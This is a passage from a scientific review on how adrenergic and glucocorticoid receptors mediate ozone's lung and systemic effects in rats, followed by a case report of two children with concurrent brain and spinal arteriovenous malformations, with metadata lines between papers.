We have shown that by eliminating the circulating ligands (catecholamines and glucocorticoids) for ARs and GRs via total bilateral adrenalectomy, the ozone-induced lung vascular leakage, injury, and inflammation were nearly eliminated, providing us with first-hand evidence of the contribution of circulating epinephrine and corticosterone and their receptor targets in mediating ozone's acute effects in rats [113]. More importantly, when only the adrenal medulla was removed while keeping the cortex in place through adrenal bilateral demedullation, which diminished circulating epinephrine while only marginally affecting levels of corticosterone, there was also a reduction of ozone-induced lung injury and inflammation, suggesting that circulating epinephrine, which binds to ARs, was critical in mediating pulmonary effects [113]. These findings were further supported by the observation that global transcriptional changes in the lungs induced by ozone in normal rats (over 2000 genes changed) were reduced by over fivefold in animals with adrenal demedullation or total adrenalectomy [114]. It is noteworthy that ozone-induced lung injury and inflammation are noted only after the first 2 days of ozone exposure; however, these effects of ozone are reversible despite daily repeated exposure for 3 or more consecutive days, suggesting adaptation.
Adrenalectomy, in addition to eliminating epinephrine and corticosterone from circulation, also depletes mineralocorticoids important in the osmotic balance of salt and water, and vascular function, thus removing the influence of endogenous ligands for ARs and GRs, as well as mineralocorticoid receptors. To assess the precise contributions of epinephrine and corticosterone, we performed a gain-of-function experiment by treating adrenalectomized rats with β 2 AR plus GR agonists, and assessed ozone-induced lung injury, systemic and pulmonary inflammation, and cytokine gene expression [4]. In this study, β 2 AR agonist was selected based on their enriched distribution in the lungs and functional significance [1]. The reduction of ozone-induced pulmonary and systemic effects by adrenalectomy, and the restoration or even exacerbation of this effect in adrenalectomized rats by treatment with a combination of β 2 AR and GR agonists, suggest that ozone's effects on the lungs are mediated by the activation of these receptors, and not because of the effects on circulating mineralocorticoids.
βAR and GR Activation Contribute to Ozone-Induced Lung Inflammation
We have also assessed the independent roles of βARs and GRs in ozone-induced inflammation by inhibiting GRs while pharmacologically activating βARs, or by inhibiting βARs while pharmacologically activating GRs, prior to exposing rats to ozone [15]. These experiments demonstrated that the effects of βARs and GRs are manifested independently after ozone exposure in animals. The involvement of ARs and GRs in ozone-induced lung injury and inflammation suggests a potential interaction of the therapeutics used for asthma and COPD, which work through the same receptor system. As ozone increases circulating epinephrine and corticosterone [14,105], it can be presumed that those taking combination treatment of β 2 AR and GR agonists will have exacerbated inflammatory and pulmonary functional outcomes of the disease upon air pollution exposure. Children with asthma using maintenance medication have greater pulmonary inflammatory responses to ozone than those not receiving medication [116], further supporting the contribution of AR and GR activation in adverse pulmonary and systemic health outcomes.
Glucocorticoids exert their anti-inflammatory effects by reducing the transcription of proinflammatory cytokines and influencing the egress and margination of granulocytes and lymphocytes from lymphoid organs [25]. The findings that ozone-induced depletion of circulating T and B lymphocytes was reversed by adrenalectomy in rats, and that the ozone's effect was regained by pretreating adrenalectomized rats with dexamethasone (GR agonist) plus clenbuterol (β 2 AR agonist), support the role of βARs and GRs in mediating systemic immune effects and pulmonary inflammation [4]. Our recent study examined the kinetics of stress hormone release together with changes in the pool of various immune cells in the circulation, as well as changes in circulating cytokines during a 4-h ozone exposure [85].
This study clearly demonstrated that the depletion of circulating granulocytes, monocytes, T helper cells, cytotoxic T cells, and B cells, occurred after increases in circulating epinephrine and corticosterone within 1 h of ozone exposure. The increases in circulating stress hormones, and subsequent increases in the expression of glucocorticoid-responsive genes in the lungs, along with the depletion of circulating immune cells, were noted, with only minimal changes in the circulating cytokines. Therefore, these data suggest that the stress-hormone-mediated activation of ARs and GRs likely leads to the pulmonary and systemic effects of ozone [85]. Ozone-induced upregulation of Tsc22d3, metallothionein 1 (Mt-1), and Fkbp5 in the lungs following increases in stress hormone levels suggests the activation of GR-responsive genes by increased corticosterone [4,6,14,85,117].
To further assess the therapeutic relevance for those using dual therapy with agonists of β 2 AR and GRs, and how this may modulate ozone-induced lung injury and inflammation, we treated rats with β 2 AR and GR agonists, individually or in combination, at therapeutically relevant dose levels prior to ozone exposure. In this study, we demonstrated that ozone-induced lung injury and inflammation are highly exacerbated by treatment with the β 2 AR agonist clenbuterol, especially when given individually [6]. This exacerbation of ozone effects was dampened when combination therapy with clenbuterol plus dexamethasone was instituted. Likewise, a rhinovirus-induced increase in IL-6 was exacerbated by salmeterol, but this effect was dampened by coadministration of inhaled corticosteroids [118]. Since we used healthy animals in our studies, the implications of these findings need to be assessed carefully in asthmatic animal models. Nevertheless, because β 2 AR and GR agonists are used extensively in the treatment of asthma and COPD, the health implications of air pollution affecting the activity of these receptors, especially for individuals receiving these agonists, could be significant.
AR and GR Antagonists Inhibit Ozone-Induced Lung Inflammation
βARs are prominently distributed in the lungs, and therefore we further assessed their role in ozone-induced lung injury and inflammation [14,113]. We used propranolol, a nonspecific βAR antagonist, with or without the glucocorticoid antagonist mifepristone, to examine the contributions of individual receptor types in mediating lung vascular leakage and inflammation after ozone exposure. Our studies in rats show that inhibiting βARs using propranolol is associated with the inhibition of ozone-induced inflammation [5]. These data suggest that ozone-induced increase in epinephrine, which binds to β 2 AR, is associated with pulmonary inflammation; however, the precise mechanisms of cell-and organ-specific differences in βAR downstream signaling will need to be further assessed with air pollutant exposure [119]. The contribution of βAR signaling, and the differential involvement of β-arrestin activation, may underlie pollutant-specific differences in downstream signaling and inflammation.
GR manipulation during ozone exposure also provided insights into their role in pulmonary injury and inflammation. Ozone-induced increases in circulating corticosterone and subsequent lymphopenia, along with time-related depletion of granulocytes and M1 monocytes, suggest redistribution of circulating immune cells, likely marginating to the pulmonary vasculature, involving the activation of ARs and GRs [85]. Pretreatment of rats with the GR antagonist mifepristone, although reducing pulmonary protein leakage, was ineffective in reducing ozone-induced neutrophilic inflammation, suggesting that GR activation within the lungs was not involved in neutrophilic inflammation [5]. Interestingly, treatment with mifepristone reversed lymphopenia induced by ozone, implying that GR activation was necessary for systemic lymphopenia, and that glucocorticoids released after ozone exposure modulated the systemic immune response [5]. The combination of propranolol and mifepristone nearly eliminated ozone-induced lung vascular leakage, inflammatory cytokine induction, activation of glucocorticoid responsive genes, and the systemic immune response (lymphopenia), implicating βARs and GRs in ozone-induced inflammatory effects.
The Role of βARs in Ozone-Induced Lung Protein Leakage
It has been shown that vascular permeability increased by intravenous substance P injection in rats was blocked by the β 2 AR-specific agonist formoterol through its effect on endothelial gap junction reduction [120], contrary to what we observed with the β 2 AR-specific agonist clenbuterol, which was associated with increased protein leakage in air-exposed rats [6]. Moreover, the protein leakage induced by ozone exposure was highly exacerbated by clenbuterol pretreatment [4,6]. Because β 2 AR has high affinity for epinephrine relative to norepinephrine (Table 1), and because ozone specifically increased epinephrine levels in rats [14,105], it is likely that pulmonary β 2 AR might be involved in pulmonary vascular leakage; however, the contribution of cardiac β 1 AR and other associated hemodynamic changes cannot be ignored in mediating protein leakage.
Rats pretreated with propranolol alone demonstrated significantly reduced vascular leakage and lung inflammation after ozone exposure [5]. Increased circulating epinephrine can have marked effects on cardiac β 1 AR, pulmonary α 1 AR, and β 2 AR. Propranolol is a nonspecific βAR blocker, which can inhibit the activity of both β 1 AR and β 2 AR. Because of marked effects of epinephrine on β 1 AR in cardiac muscle contractility, and on β 2 AR in vascular and bronchial smooth muscle relaxation, an ozone-induced epinephrine increase may lead to hemodynamic changes in the low-pressure pulmonary vasculature. Moreover, due to parasympathetic dominance over sympathetic activation on the heart [121], even though an ozone-induced increase in epinephrine was apparent [14,105], cardiac depression in rats acutely exposed to ozone was associated with bradycardia [121]. This imbalance of sympathetic and parasympathetic influence might specifically exacerbate hemodynamic changes in the low-pressure pulmonary vasculature, leading to vascular protein leakage in the alveoli. Hypoxia-induced pulmonary injury in rats has been shown to involve catecholamines, such as epinephrine, and their action on αARs and βARs [122]. Both αARs and βARs have been implicated in pulmonary edema [123,124]. Based on the reversal of ozone-induced pulmonary edema by propranolol [5], it is likely that these receptors may also play an important role in the modulation of hemodynamic changes after air pollution exposure.
Circulating Ligands of ARs and GRs in Lung-Brain Communication
In order to better understand the contribution of the lung-brain axis through the activation of ARs and GRs to mediating ozone-induced pulmonary and systemic effects via increases in circulating epinephrine and corticosterone, we further examined circulating pituitary-derived hormones and gene expression changes in the stress-responsive regions of the brain, such as the hypothalamus and the brainstem, in rats with sham surgery and those with total bilateral adrenalectomy [7]. It has been previously shown that acute ozone exposure activates stress-responsive regions-such as the nucleus tractus solitariuswithin the brain stem and the hypothalamus, where stress signals are processed [125]. In our study, a single ozone exposure was associated with marked gene expression changes in the brainstem and the hypothalamus, which reflected changes induced by hypoxia, inflammatory signaling, and steroidal as well as mTORC signaling, suggesting cellular homeostatic physiological alterations through adrenergic and steroidal signaling in both brain regions [7]. This was further supported by nearly 70% similarity in the genes upregulated by ozone in both of these brain regions. One of the important findings from this study was that no gene expression changes were noted in adrenalectomized rats exposed to air relative to sham rats, with severely depleted epinephrine and corticosterone [7], suggesting that stress signals through circulating AR and GR ligands were needed to induce changes in the rats' brains. Moreover, virtually no gene expression changes occurred in ozoneexposed adrenalectomized rats, implying that in the absence of circulating epinephrine and corticosterone there were no cellular responses produced in either brain region, and that pulmonary AR and GR activation is necessary for ozone-induced gene expression changes to occur in the brain. Although adrenalectomy also markedly reduced lung gene expression [114], one could presume that the activation of ARs and GRs in the lung is critical for changes in the lungs and brain to occur after ozone exposure. Furthermore, communication between the lungs and the brain was needed in order to receive a stress signal in the brain from irritancy stress after ozone exposure. It is noteworthy that ARs and GRs have been implicated in stress adaptation and resiliency, and that the failure of normal functioning of these receptors has been linked not only to neurological ailments but also to peripheral chronic diseases [16,17,19]. Thus, the contribution of these receptors to airpollutant-induced stress responses and subsequent pulmonary, neuronal, and peripheral effects, as well as adaptation, warrant further consideration.
Potential Interactive Roles of ARs and GRs in Inflammatory Mechanisms
Although research has uncovered that ARs and GRs influence inflammatory responses in the body and regulate physiological homeostatic processes, few studies have elucidated whether these receptors interact during the activation of molecular signaling pathways at the level of second messengers [126][127][128]. Given the diversity and the interconnectivity of AR/GPCR-mediated signaling, spanning various second messengers, and GR-mediated transcriptional activity, along with cooperativity with other transcription factors influencing the expression of about 10-20% of the human genome (as reviewed in [25]), it is conceivable that there are interactive influences on the physiological effects of AR and GR activation. The primary evidence for interactive influence comes from the therapeutic efficacy of combinational therapy involving β 2 AR agonists as bronchodilators and GR agonists as immunosuppressants. To understand the mechanisms of the collective influence of a combination therapy involving bronchodilators and steroids, Mostafa et al. [126] examined global transcriptome changes induced by individual and combination treatment in airway epithelial cells. This study demonstrated that the action of glucocorticoids agonist budesonide suppressed the transcription of proinflammatory gene expression in cells, while enhancing the transcription of apoptosis, proliferation, differentiation, and other functional processes in cells treated with the β 2 AR-specific agonist formoterol, suggesting that the interactive effects at multiple levels may influence the effectiveness of the therapy. These authors have further reported that long-acting βAR agonists do not necessarily enhance the expression of all glucocorticoid-inducible genes, but have gene-specific effects [127].
The interactive influence of glucocorticoids and catecholamines has also been reported at the level of the neuroendocrine system. Glucocorticoid modulation of pituitary adrenocorticotropic hormone (ACTH) release can alter thymus catecholamine availability through its influence on sympathetic nerve terminals, and change AR gene expression [128]. It has been suggested that dexamethasone-induced GR activation interferes with the trafficking and degradation of the β-arrestin-α 2 cAR complex in human neuroblastoma cells [129]. Long-term use of bronchodilators has been reported to cause β 2 AR desensitization in airway smooth muscle cells and reduction in therapeutic efficacy. It has been shown that GPCR-kinase-mediated phosphorylation of ligand-bound receptors leads to β-arrestin binding, which prohibits further receptor G as coupling and cellular signaling [130]. GR activation normally reduces β-arrestin 2 levels in lung epithelial cells, which is hypothesized to counteract the β-arrestin-2-induced desensitization and, thus, increase the therapeutic efficacy of bronchodilators [92]. This reduction would enable β 2 AR agonists to activate signaling to cause airway smooth muscle relaxation and improve lung function. The activation of β 2 AR has been shown to enhance GR-mediated transactivation through G bg subunits and PI3 kinase [131]. Stimulation of β 2 AR increased cAMP, and led to cross-talk between CREB proteins and GRs [132]. It is likely that these interactive effects might involve common second messengers, leading to changes in downstream signaling events. Thus, interactions between AR signaling and GR-mediated transcriptional changes are likely involved in the therapeutic efficacy of combination treatment using β 2 AR and GR agonists for asthma and COPD. Because ozone exposure was shown to increase both epinephrine and corticosterone, the potential for interactive effects through endogenous AR and GR ligands is also likely. The combination treatment with the β 2 AR agonist clenbuterol and the GR agonist dexamethasone in rats, at therapeutically relevant dose levels, dampened ozone-induced inflammatory responses when compared to the responses induced by clenbuterol alone [6]. Future studies on air pollutants should examine the interactive influence of activating AR subtypes and GRs.
Air Pollution's Impact on Circadian Clock Genes, and the Potential Mediating Roles of ARs and GRs
Neuroendocrine pathways that mediate ozone effects are also known to regulate the expression of circadian clock genes and associated physiological changes (reviewed in [133,134]), raising the possibility that circadian mechanisms together with AR and GR signaling might also be involved in air pollution health effects. Exposure to air pollution has been associated with disturbed sleep cycles and obstructive sleep apnea [135]. Cantone et al. [136] recently reported that in acute ischemic stroke patients, PM exposure was linked to changes in methylation of the CLOCK regulated genes. PM exposure in utero has also been shown to disrupt the placental epigenetic signatures of CLOCK genes in women, which may be linked to inflammatory changes [137]. Experimental evidence has begun to emerge linking exposure to air pollutants to changes in the expression of circadian genes, and to downstream signaling events that lead to changes in inflammation and metabolic processes. Exposure to air pollutants in mice has been reported to induce changes in chromatin dynamics by downregulating histone acetylases, causing increased promotor occupancy, altering the expression of genes involved in neuroendocrine-mediated circadian rhythmicity, and subsequent changes in genes regulating brown adipose tissue as well as liver metabolic processes [138]. These processes have been shown to be regulated at the cellular level through ARs and GRs [139], implying that oscillatory changes in the levels of circulating adrenal-derived hormones are linked to changes in neuronally induced diurnal rhythmicity.
Since the SAM and HPA axes coregulate circadian and stress-induced peripheral immune and metabolic homeostasis, it is conceivable that health effects induced by air pollutants through this pathway could impair circadian rhythmicity and associated peripheral changes (Figure 4). Diurnal and stress-induced variations occur not only in metabolic processes, but also in the immune surveillance to assure protection during active period [139,140]. Hypothalamus, the master regulator of environmental cues, receives stress signals from external and internal stressors though autonomic sensory nerves and light signals directly from the suprachiasmatic nucleus (SCN), which is connected to the retina [141]. The hypothalamus integrates the information received to from both sources to generate bodily response through neural and endocrine mechanisms involving the SAM, HPA, and other hormonal axes to direct peripheral immune and metabolic responses via the activation of ARs and GRs [17]. Diurnal oscillations are evolved through complex selfregulatory mechanisms of genes and transcription factors in the brain and other peripheral organs, and work in tandem with adrenergic and glucocorticoid mechanisms to mediate physiological changes to synchronize with changes in activity patterns. The oscillatory pattern in response to diurnal changes programmed by the hypothalamus is communicated to the periphery through sympathetic nerves and the SAM and HPA axes [133,134]. This results in oscillatory changes in the production of norepinephrine at nerve terminals, as well as catecholamines and glucocorticoids within adrenals and blood, which then mediate pulsatile downstream changes in immune cell maturation, egress, and inflammation through ARs and GRs (Figure 4). Proposed schematic of how adrenergic and glucocorticoid mechanisms regulate circadian changes and environmental stress signals to direct immune responses with oscillatory patterns. The suprachiasmatic nucleus (SCN), receiving photonic signals from the retina via the retinohypothalamic tract, transmits these to the paraventricular nucleus (PVN) of the hypothalamus, which also integrates other stress signals from afferent autonomic sensory nerves, including those induced by pulmonary encountered air-pollution-induced stress. These signals are integrated in the hypothalamus and relayed to the periphery through: (1) sympathetic nerves, which transmit signals to the peripheral organs by releasing norepinephrine (NE); (2) sympathetic nerves innervating the adrenal medulla and regulating the production and release of epinephrine (EPI) and norepinephrine into circulation; and (3) the hypothalamus-pituitary-adrenal (HPA) axis mediating the pituitary release of adrenocorticotropic hormone (ACTH), and then stimulating glucocorticoid (GC) production by the adrenal cortex. Adrenal glucocorticoids locally regulate the release of medullary hormones. Catecholamines and glucocorticoids released into circulation induce pulsatile cellular physiological changes resulting from stress and circadian rhythms through binding to their receptors-AR and GR subtypes, respectively. Within the central nervous system, the locus coeruleus (LC) produces norepinephrine, which is transmitted across many brain regions, including the SCN, and can regulate circadian changes centrally. Circulating catecholamines and glucocorticoids bind to ARs and GRs in diverse organs and cells, including immune cells, to regulate the expression of the circadian locomotor output cycles kaput (CLOCK) and brain and muscle aryl hydrocarbon receptor nuclear translocator-like 1 (BMAL1) regulated genes. The signaling involves the activation of transcription factors, including the cyclic AMP response element-binding protein (CREB), to modulate the expression of CLOCK and BMAL1-regulated genes. The CLOCK and BMAL1 transcription factors regulate the transcription of genes encoding circadian proteins, such as period circadian proteins (PERs) and cryptochromes (CRY). The rhythmic activation of GRs upon binding to GCs, and their nuclear translocation, can modulate gene expression for inflammatory processes in association with CLOCK and BLAM1 in immune cells that facilitate diurnal changes in maturation and homing of immune cells and inflammation.
Rhythmic variations in catecholamines and glucocorticoid release [142] are regulated by transcriptional regulatory loops involving the circadian locomotor output cycles kaput (CLOCK) and brain and muscle aryl hydrocarbon receptor nuclear translocator-like 1 (BMAL1), which drive period circadian protein (PER) and cryptochrome (CRY) genes by binding to their promoters [143,144]. Brain-derived norepinephrine from the locus coeruleus is presumed to modulate SCN-mediated oscillatory changes [145,146], contributing to circadian changes in sympathetic and HPA-mediated regulation of immune surveillance in the periphery [139,140]. Likewise, GRs also demonstrate oscillatory patterns of diurnal changes [142] through binding to glucocorticoids, and exert cellular effects through the regulation of inflammatory gene expression. Thus, although currently no studies have linked changes in circadian regulatory mechanisms through ARs and GRs following air pollution exposure, it is conceivable that this receptor system is critical in mediating responses to environmental cues, including diurnal variations through light cycle. Given the current evidence that AR and GR functionality is critical in ozone-induced pulmonary and systemic effects, and that exposure to air pollutants is linked to alterations in sleep cycle and genes involved in circadian rhythmicity through epigenetic processes, future air pollution studies should consider a comprehensive assessment of the neuroendocrine stress response system, that includes circadian mechanisms.
Research Gaps and Opportunities
We demonstrated that ozone, a prototypic oxidant air pollutant, induces its effects via the neuroendocrine-mediated release of epinephrine and corticosterone, which cause cellular effects by interacting with their receptors-ARs and GRs, respectively [5]. Being an oxidant air pollutant, on inhalation, ozone initially interacts with the airway surface lining and alveolar components [80]. Within minutes after an initial encounter with ozone, there is an increase in the sympathetically mediated release of epinephrine, followed by the HPAmediated release of corticosterone (endogenous ligands for ARs and GRs), prior to increases in cytokine mRNA in the lungs or inflammation [85]. The mechanism by which this initial communication between the lungs and the brain occurs is critical to understanding the role of these receptors in mediating the health effects of air pollution, because, in the absence of these circulating receptor ligands, ozone produces neither lung injury/inflammation nor brain effects [5,7,113]. Although the autonomic sensory innervation and lung-brain neural communication are well studied [147], it is not well understood how the initial irritation induced by air pollutants in the lungs is communicated to the brain in order to induce a neuroendocrine stress response involving ARs and GRs. It has been postulated that bioactive mediators released by the lung cells are responsible for the extrapulmonary and even brain effects of air pollutants [148,149]; however, inflammation takes several hours to occur, but neuroendocrine effects are noted within an hour [85]. Although our studies show that activation of ARs and GRs is required, and that the SAM and HPA axes are stimulated within minutes of ozone exposure, resulting in increased circulating epinephrine and corticosterone, it is important to understand how the initial event induces the neural axes, as well as the role of circulating stress hormones in mediating this event through ARs and GRs.
Due to the diversity of AR and GR subtypes, their involvement in multicellular responses and regulations, and their essential roles in physiological processes, it is difficult to identify one or more specific proteins or genes that will reflect the activity of these receptors. Likewise, assessing one biological response at a time may provide an incomplete understanding of the integrated roles of ARs and GRs in mediating and regulating circadian oscillatory changes and stress. Therefore, in order to clearly delineate the contribution of these receptors, a comprehensive assessment of AR-and GR-regulated processes involving the neuroendocrine system is needed. Experimentally, it is possible to determine the genomic effects of GR activation through transcriptional changes in downstream gene targets; however, the interactive influence of other transcription factors and the downstream effects of GRs are difficult to assess in isolation. Moreover, AR/GPCR signaling is complex, and involves multiple G proteins and second messengers, which are critical in investigating the specific mechanisms. Thus, novel and multipronged approaches together with consideration of temporality are needed in order to identify the precise contributions of ARs and GRs and their coregulation in inducing air pollutant-induced changes. The availability of a wide variety of specific receptor agonists and antagonists for both AR and GR subtypes offers the opportunity to assess the roles of each receptor subtype in cellular effects induced by air pollutants.
Since ARs and GRs are involved in neuroendocrine stress and circadian responses that involve peripheral tissue effects, assessing their contributions provides insights into how air pollutants may affect multiple organ systems, and how the failure of the multifaceted neuroendocrine system to function normally can contribute to chronic diseases. Because ARs and GRs have been implicated in regulation of stress and stress adaptation in the brain [16,17,19,150], it is likely that any malfunction of these receptors because of underlying chronic psychosocial stresses or other conditions, such as altered exposure to the light-dark cycle, will modify how air pollution's effects are mediated. The evaluation of these receptors in the interactive cellular effects of environmental and psychosocial stressors, as well as circadian rhythmicity, will be critical to understanding individual variability in the health effects of air pollution. Incorporating the roles of ARs and GRs will also have important implications for individuals receiving steroidal and bronchodilator treatments, since they may have exacerbated responses to air pollutants. Thus, future air pollution studies will benefit from assessing the roles of various neuroendocrine hormones, and how their influence on ARs and GRs mediates cellular effects and downstream molecular events in response to stress and diurnal changes. | 2021-06-27T05:27:40.692Z | 2021-06-01T00:00:00.000 | {
"year": 2021,
"sha1": "b2672ef9b083ce5d43fb6e450f579979b4bc5d8e",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2305-6304/9/6/132/pdf",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "b2672ef9b083ce5d43fb6e450f579979b4bc5d8e",
"s2fieldsofstudy": [
"Environmental Science",
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
207488841 | pes2o/s2orc | v3-fos-license | Concurrent intracranial and spinal arteriovenous malformations: Report of two pediatric cases and literature review
Background: Concurrent intracranial and spinal arteriovenous malformations (AVMs) are very rare with only a few cases being reported in literature. Two of the rare concurrent intracranial and spinal AVM cases are presented. Case Description: Case 1 is a 12-year-old girl with headache and motor disturbances in the lower limbs. Her spinal and brain angiogram was done and she was diagnosed to have a spinal AVM at level T8–T9 and an intracranial AVM in the left mesial temporal lobe. Her spinal AVM was embolized, while no treatment was given for her intracranial AVM. Case 2 is a 10-year-old girl who presented with headache and quadriparesis. Her brain and spinal angiogram revealed an intracranial AVM in the left parietal lobe and a spinal AVM at level C2, respectively. Craniotomy and excision was done for her intracranial AVM and embolization for the spinal AVM. Conclusion: It is proposed that multiple AVMs may be a result of yet unrevealed pathogenesis or strong embryogenetic anomaly, which may be different from that involved in single AVM. With lack of consensus over the best therapeutic strategy, multimodality treatment based on the individual's needs is suggested.
INTRODUCTION
Single intracranial arteriovenous malformation (AVM) along with a spinal AVM is very rare with less than 10 cases being reported in literature since 1969. Multiple intracranial AVMs with a spinal AVM are even more infrequent; only three other cases have been reported in the literature, one being an autopsy case. We report two such uncommon cases involving an intracranial AVM along with a spinal AVM.
Case 1
The first case of intracranial AVM along with a spinal AVM involves a 12-year-old girl who presented to us with a 3-month history of headache and progressively worsening spastic paraparesis with reflex spasms of both lower limbs. There was no history of lower back pain and no bladder or bowel disturbances. Examination showed power of 3/5 in the right lower limb and 4/5 in the left lower limb, with normal bulk but increased muscle tone. She also had brisk reflexes in both lower limbs. Cognitive functions, speech, and upper limb reflexes were normal, along with intact sensations and cerebellar functions. She had been in a good state of health in the past and her family history was negative for any hereditary vascular disorders or AVMs. Magnetic Resonance Imaging (MRI) of dorsolumbar spine showed epidural flow voids. Spinal angiogram showed an AVM in mid-dorsal region at level T8-T9 with three feeders comprising left 8th and right 9th and 10th intercostal arteries [ Figure 1a]. Brain imaging studies were done to investigate any intracranial pathology responsible for her persistent headache. Her brain MRI and Magnetic Resonance Angiography (MRA) revealed a small AVM in the left hippocampus supplied by left posterior cerebral artery and with deep venous drainage [ Figure 1b and c]. There was no hemorrhage from the lesions, and ischemia due to spinal AVM seemed to be the probable cause of her paraparesis.
Spinal AVM embolization was carried out by polyvinyl acetate (PVA) and histoacryl particles under general anesthesia and complete embolization was achieved [ Figure 1d]. No treatment was offered for her cerebral AVM and her headache was managed conservatively with analgesics. The hospital course was smooth and she was discharged after a total of 5 days of hospital stay.
On follow-up after 1 year, the patient was doing well with no significant symptoms. She was able to work independently and did not require further treatment.
Case 2
The second case of single intracranial AVM with concurrent spinal AV fistula involves a 10-year-old girl who presented to us with headaches and progressively increasing weakness of all four limbs for 2½ years. On examination, she had decreased bulk of muscles and increased tone in both upper and lower limbs. She also had brisk reflexes, upgoing planters , and clonus. She was quadriparetic with power of 3/5 in the right upper and lower limbs and 4/5 in the left half of body. She was otherwise conscious and well oriented to time, place, and person, and her sensations were intact. Her past history was unremarkable and there was no significant family history of any hereditary vascular disorder or AVMs. Her brain MRI and cerebral angiography revealed left parasagittal AVM of medium size in the parietal region with superficial venous drainage [ Figure 2a and b]. Craniotomy and excision was done in another institute. Postoperatively, she was doing well with no residual AVM on her cerebral angiography [ Figure 2c].
After her cranial surgery, her symptoms recurred and she showed progressive weakness and signs of myelopathy in all four of her limbs. Angiography was repeated, which revealed an AV fistula in the cervical region [ Figure 2d]. Multiple feeders were observed that included bilateral vertebral arteries, bilateral posterior inferior cerebellar artery (PICA), and left costocervical artery from subclavian artery. Some tortuosity was observed in the previously treated AVM in the left parietal region, but no arteriovenous (AV) shunting was seen. Few tortuous abnormal vascular channels were seen in venous phase. MRI also showed a cervical aneurysm [ Figure 2e and f]. There was no hemorrhage from the lesion and her symptoms were probably because of ischemia secondary to steal phenomenon.
Angiographic coiling of aneurysm was done and feeders from vertebral arteries and PICA were embolized. Tiny feeder from left costocervical artery was embolized with histoacryl glue. No residual AV fistula was seen in post-procedural angiography [ Figure 2g and h] and no postoperative complications occurred; patient was stable and got discharged.
On follow-up, the patient was doing well and the treatment of AV fistula seemed to be adequate. However, after 1 year and 4 months, the patient showed signs of mild weakness in left-sided upper and lower limbs. She was able to carry out most of the tasks independently; however, she limped while walking and had weakness of left hand and fingers. The patient refused further evaluation and management.
DISCUSSION
Multiple AVMs have been seen to be associated with hereditary disorders such as Rendu-Osler-Weber syndrome or hereditary hemorrhagic telangiectasia. It is extremely uncommon to see concurrent intracranial and spinal AVM not associated with such syndromes.
Single intracranial AVM along with a spinal AVM is intracranial AVMs with a spinal AVM are even more infrequent; only three other cases have been reported in the literature, one being an autopsy case. [7,13,14] The earliest cases comprise those reported by Di Chiro et al. in 1972 [1] and 1973; [3] however, exact details of those cases were not available. Also, Krayenbuhl et al. reported such a case involving AVMs in cerebellum and spinal cord earlier in 1969. [11] The details of all the intracranial AVMs coexisting with spinal AVMs are listed in Table 1, along with our cases. The sizes of the intracranial AVMs were graded as small (<3 cm), medium (3-6 cm), or large (>6 cm), and their venous drainage as superficial or deep, in accordance with Spetzler and Martin's grading system. [18] The spinal AVMs were grouped into single coiled, glomus, and juvenile types as Di Chiro et al. classified them. [2,4] The age at presentation ranged from 1.3 to 55 years, with a mean age of 23.8 years. There were five males and six females. Six cases presented with subarachnoid hemorrhage (SAH), intraventricular hemorrhage (IVH), or intracerebral hemorrhage (ICH) as a result of hemorrhage from AVM. Out of the 19 intracranial AVMs whose size was known, there were 16 small and 3 medium intracranial AVMs. Moreover, out of the 17 lesions with known venous drainage, 15 intracranial AVMs had superficial and only 2 had deep venous drainage. The level of spinal AVM ranged from C1 to L2. There were four glomus, two dural, and one juvenile spinal AVMs.
AVMs are congenital lesions occurring between the fourth and eighth weeks of embryonic development when vessels differentiate into arteries, veins, and capillaries. [5] These lesions are formed by masses of abnormal arteries and veins lacking a true capillary bed in the nidus. [23] The nidus of the AVM comprises large vessels without the elastic layer in the walls. The arteries are deficient of muscularis layer and the draining veins are often dilated due to the high velocity of the flowing blood. Various studies have been done to identify the role of angiogenic factors in the pathogenesis of AVM. [17,21,24] Tamaki et al. proposed various developmental defects or multiple failures in the persistence of primitive capillary beds as the pathogenesis of multiple AVMs. [19] According to Hasegawa et al., extensive disturbances in early ephrin/ ephrin receptor interactions in the embryo may cause multiple AVMs. [7] Familial AVMs are extremely rare, manifesting at a younger age and occurring more frequently in females. [25] Yet, it has been proposed that genetic factors may be involved in the occurrence of familial AVM. [25] Previously, ALK1 and ENG genes had been shown to be associated with sporadic brain AVM. [16] Moreover, single nucleotide polymorphism in interleukin (IL) genes has also been associated with increased risk of AVM among certain racial or ethnic groups. [10] Nevertheless, multiple AVMs may be result of yet unrevealed pathogenesis or strong very rare, with total number of cases reported in the literature being less than 10 since 1969. [8,9,15,20,22] Multiple AVM is known to produce harm by its rupture or rupture of an associated aneurysm, by causing seizures, or by causing ischemia of the adjacent brain matter by the steal phenomenon. [12] Hence, it is essential to screen and treat AVMs as the symptoms require. Hash et al. suggested that screening for multiple AVMs is warranted in cases when a single lesion does not explain the presenting symptom or sign. [8] Parkinson et al. also advised spinal angiography for investigation of spontaneous SAH in patients with no demonstrable intracranial source. [15] The angioarchitectural factors that increase the risk of hemorrhage from an AVM include the presence of flowrelated aneurysm, presence of intranidal aneurysm, deep venous drainage, deep (periventricular) location, small nidus size (<3 cm), high feeding artery pressure, slow arterial filling, and venous stenosis. [6] With the main aim of complete angiographic obliteration of the AVM, treatment modalities like microsurgery, endovascular embolization, and stereotactic radiosurgery have an established role in the treatment of patients with AVM, and a staged approach has been proposed for patients with multiple AVMs. [6] We suggest that multimodality treatment tailored for individual cases should be practiced.
CONCLUSION
Multiple AVMs can co-exist in brain and spinal cord, and can be difficult to detect and manage. We suggest that in cases where one lesion does not explain all the symptoms or if there is progressive worsening of symptoms, there should be a high index of suspicion for another lesion and further investigations are warranted. For patients with concomitant intracranial and spinal AVM, multimodality treatment tailored for individual cases currently seems to be the best approach. | 2018-04-03T00:33:36.749Z | 2012-05-14T00:00:00.000 | {
"year": 2012,
"sha1": "961e239d6094491892c43f5db044401d69eb2ca2",
"oa_license": "CCBYNCSA",
"oa_url": "https://ecommons.aku.edu/cgi/viewcontent.cgi?article=1141&context=pakistan_fhs_mc_mc",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "3b1ae1aee1e7ff4f7e044f59ac92e94c7aa00312",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
26232262 | pes2o/s2orc | v3-fos-license | 2 Cryopreservation of Adherent Smooth Muscle and Endothelial Cells with Disaccharides
